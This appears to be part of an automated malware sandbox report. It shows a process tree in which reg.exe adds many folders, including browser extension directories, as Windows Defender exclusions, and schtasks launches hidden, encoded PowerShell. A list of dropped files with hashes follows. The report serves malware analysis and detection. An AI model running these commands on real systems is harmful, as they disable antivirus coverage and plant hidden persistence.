                                                                                                                                                                                                            PID:2844
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:3136
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:3096
                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:1500
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:5780
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:1112
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:4696
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:3116
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:2856
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:5192
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:3272
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:5468
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:1560
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:1556
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:4792
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:1688
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:1616
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:5652
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:4052
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:5476
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:5436
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:5836
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                      schtasks /CREATE /TN "gNyxlCFCI" /SC once /ST 03:55:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                      PID:3944
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                      schtasks /run /I /tn "gNyxlCFCI"
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:4392
                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:6120

                                                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                                                      • C:\ProgramData\Are.docx

                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        11KB

                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                        a33e5b189842c5867f46566bdbf7a095

                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                        e1c06359f6a76da90d19e8fd95e79c832edb3196

                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                        5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                        f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

                                                                                                                                                                                                                                                      • C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        593KB

                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                        c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                        95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                        ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                        fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                                                                                                                                      • C:\ProgramData\nss3.dll

                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        2.0MB

                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                        1cc453cdf74f31e4d913ff9c10acdde2

                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                        6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                        ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                        dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        2KB

                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                        d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                        31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        2KB

                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                        968cb9309758126772781b83adb8a28f

                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                        8da30e71accf186b2ba11da1797cf67f8f78b47c

                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                        92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                        4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        19KB

                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                        b3b52eb769675fb96242c927e9ef0e2f

                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                        c51371ac1662fc18be61bd5b61f3377ab550d9cc

                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                        a23836f60d3b886fd7bf119fbb97d93ee459baf212db882a62b0fb6a0ec58830

                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                        ececaa7e55fe9564adbfdf5151dc75311569a28011f51eeb02162c4be38355f5480b010414e4da0d981eb8a343c122ea17bb28b92ad569aabc6f0ce49e461818

                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        19KB

                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                        fea5536520353aa32142a95f11465367

                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                        bf4069cc7607cf080ff3989c66b612a27abca137

                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                        65383395c6fbc9014c8a42c94d5c66bd0c33b6e30a16266b79731ff238a59253

                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                        4b5593894260bade1c2b6f8b9359ede95497e093d04673e5b050a3133a873561bf86c0cfc6a9017df77c92f56421f2cab7fd5aacd7a76e1349fbe6c4d47b6483

                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        944B

                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                        cb3a799921d48256ab45414af88b0aa8

                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                        8888fb5656f5f11576c0fbc3ba45d7df56000d28

                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                        5ad60a0e324106c6b5a8a7c41b4eac83234ed53cf26025dd4d63c0750b265105

                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                        21b53b49d0f95cb600444b15a274c31d9374ae96dc2ab464e6ada96bae11f1000e92f6f51f62e5b91891dbbb30e6ab9c71006a9a166b8d4ae24457dcd7efdf69

                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404011330301\additional_file0.tmp

                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        2.5MB

                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                        20d293b9bf23403179ca48086ba88867

                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                        dedf311108f607a387d486d812514a2defbd1b9e

                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                        fd996b95ae46014edfd630bfc2bf8bc9e626adf883a1da017a8c3973b68ec348

                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                        5d575c6f0d914583f9bb54f7b884caf9182f26f850da9bdd962f4ed5ed7258316a46fafaf3828dccb6916baaadb681fe1d175a3f4ed59f56066dc7e32b66f7b6

                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404011330301\assistant\assistant_installer.exe

                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        1.9MB

                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                        b3f05009b53af6435e86cfd939717e82

                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                        770877e7c5f03e8d684984fe430bdfcc2cf41b26

                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                        3ea8d40fcede1fc03e5603246d75d13e8d44d7229d4c390c39a55534053027f7

                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                        d2dee80aaa79b19f1eb1db85079a05f621780e06bfea9e838b62d757ba29399f9090ec7c6ff553377c9b712f3ba8dd812cdff39f3e28829928e86746a8ac6b27

                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404011330301\assistant\dbghelp.dll

                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        1.7MB

                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                        925ea07f594d3fce3f73ede370d92ef7

                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                        f67ea921368c288a9d3728158c3f80213d89d7c2

                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                        6d02ebd4ec9a6093f21cd8ccefb9445fa0ab7b1f69ac868a5cfc5d28ed8d2de9

                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                        a809851da820d9fdd8fb860a8f549311dcc2579df2c6f6fba74f50d5d8bf94baa834b09fb5476ac248f18d1deb6b47d4fdd6d658889d5d45ca8774a9264483d2

                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404011330301\opera_package

                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        103.9MB

                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                        401c352990789be2f40fe8f9c5c7a5ac

                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                        d7c1e902487511d3f4e1a57abdee8a94d5483ed4

                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                        f62f4ebc7eca46d9cddfb02cc0305da5efdd6f3601fb0f53da555e19558869a3

                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                        efc6d4224e3721e91efb2ea8f4b74685cba607260c69d08eac26866c52b8127080a42799d9f76ab1661b8ca63c946fcf35dddf0a63ab3cd258ea44a27dd769c8

                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe

                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        1.8MB

                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                        0193ae529e1b5a9af6c9e0a9764e7c0f

                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                        4db7d28f2b787386c3f60cc3d646d25553311ae3

                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                        bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e

                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                        355f310885fc61f433244bdd11b65d534891e77daffb2fe4005f59f619ce564615b8959e2a99049d849dd07dfccdeba07889d839344788e5dfbc58f9b738b5c7

                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1001085001\file300un.exe

                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        3.3MB

                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                        584b95fa5d21e178c978ed9171473514

                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                        f3f67fd04f7539b73e6fcf3b941d279212fff907

                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                        2a14c443a77b0333cc9646bc676e8c9bcd8789904f3e6b3b73ad8c604649bdb6

                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                        47fe759e2908050bcb9314a9d4cb6a807ff201847bd898a8ff73c8e96f18dd8e7f39e5446e3fa4e73444ba15e4698a2764f3a98bc8ab8897279e25b388aab1d5

                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS27B7.tmp\Install.exe

                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        6.4MB

                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                        25bec86ec5f3be6d47f6052d92818556

                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                        fc674aca2929928fcc4b721a0fb4e973feb1f2b1

                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                        c68e172cb274a12008be6047216dbe280559b164702792817ce21ff4ba9660da

                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                        649c3e9e966d4d2679ce95f91f0fdb1638dcc1ca8555fabd87bba16a39e02ddd856a897d5d7f0a80d19f1f9e02a5e569ca11031446b24b971d6fb9000f8204c2

                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS533C.tmp\Install.exe

                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        6.7MB

                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                        b119ea556def66eaa9f751a650b45af0

                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                        daf3fa0325b110183d0a233b4b0d1875f0b49ca8

                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                        53c38771ea9986f418a48d89e4df5e82c84f1e71a4c242fc6e6ae3ba934cf6d4

                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                        08dd919ce39af698051b4f156faa8d155c41cc0de3412ef152dc6e90cbdd5cb50109f57c47555925fd6d18816411b1c510ac642b9576f5f28540be8695ed46c4

                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\BGIIDAEBGC.exe

                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        106KB

                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                        fe380780b5c35bd6d54541791151c2be

                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                        7fe3a583cf91474c733f85cebf3c857682e269e1

                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                        b64a84d1f88e4e78464a1901c1cb5bbd5f00bb73203d719e64e072157a087b53

                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                        ba05ba8aa13c4bc1cf98fbf6c08b021e8b19354098e0397fc8e1e5d3dcce367c1063203f24e50d0973193f6535681d0a43486e5dade5d112853b7a2fe8739b6c

                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Opera_installer_2404011330222203800.dll

                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4.6MB

                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                        117176ddeaf70e57d1747704942549e4

                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                        75e3ab6b3469d93cce9ea2f7e22b71b987ccdf2b

                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                        3c5b34de987116a4d3240e319c0da89a951c96b81e6705476a0fea27b22b20af

                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                        ca2a356929c92d314aab63d7f3b246d72783212dfa3a4507f28d41a51ca0eedc78e85b1cd453aa8e02c12509f847a0216bb702154f903291c804c8a98ec378b9

                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_04r1v0l0.znw.ps1

                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        60B

                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        2KB

                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                        ed3b207e0c24c10959d89f47e0794ae4

                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                        88719dc491efcbce99e7eaae3eebd39d7692548d

                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                        c8de5bf65decb0cd7fe4e629162b818228ca1468f6e6e5d06b39abe25c79ed41

                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                        135313913c5adc71a97329bdce1c028d07e99afd6a66f3c2d94a5f1c389bbad486b8e10574cf73b549d0b0fa504da7ad0f7ef9f0a4f74974cb973f43bde2317b

                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        3KB

                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                        bcb6ebf2905f0ccb8aa25801981ac20f

                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                        68fefd9f35c97710fc4fcdb7ca0517ecbbb930d7

                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                        59fa52da532ad65dad74084fe0df115aba37e666294f6b8f75058f03eea8106b

                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                        e979e5127e159c65dfe5d3b6439ca21e4208b58feb984364622873d07cc3c2b4fd3d9f47884a30ecd96c9e43d0d9654688642323bf00465aa2b8cd55d603df50

                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\u2rg.0.exe

                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        268KB

                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                        3e1e8709474df25e4c4cbfac47701fc9

                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                        9845a690f6c10d2d68d39637d46dbc238763501a

                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                        07d5b5d440312add7ca4b0b55cadaa3770df47e61907e0e3b4c80b4ac775fd54

                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                        10c66705d847d70c5edd169c9b10c4da94885fb1a94a9c488bf02de39700de5c8709e2bff1c99e26b3393e77c8785977f7e29ff2ba8940417c1495dfe6712bc4

                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\u2rg.1.exe

                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        4.6MB

                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                        397926927bca55be4a77839b1c44de6e

                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                        e10f3434ef3021c399dbba047832f02b3c898dbd

                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                        4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7

                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                        cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                        109KB

